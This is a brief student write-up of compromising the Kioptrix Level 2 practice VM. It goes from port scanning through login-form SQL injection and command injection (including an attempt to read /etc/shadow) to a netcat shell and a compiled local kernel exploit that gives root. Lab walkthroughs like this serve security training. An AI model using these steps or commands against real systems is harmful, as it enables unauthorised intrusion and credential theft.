Lab 5 Kioptrix Level 2

Information Gathering

Service Enumeration

based on the picture on nmap, i found some port open, such as port 22 (ssh), 80 (http), 111 (rpcbind), 443 (ssl/http), 631 (ipp), and 3306 (mysql).

Vulnerability Assement

here i try to inject the form login, and it works.

I directly redirected to Administrative web console.

Exploit

so i try to use command execution attack vector.
here i try to see the information kernel.

now, i know that the server use kernel 2.6.9, then i try to see the /etc/passwd and /etc shadow. but it not works for ;cat/etc/shadow.

then i try to search the local exploit for kernel 2.6.x after that i copy it to /var/www/

then i download it to directory /tmp on target machine and compile it.

 

 we can see that the file exploit (9545.c) has been succeded. So execute it.

but i still on apache. until here I need to find a way to get into the server and then i will execute the exploit from within the server. so i try to type netcat command for listing on port 1234.

then connecting via netcat by type nc 192.168.56.101 1234. after that, execute the exploit (rooting)

we can see that our exploitation has been succes, and i'm on root now.

Alhamdulillah.... :D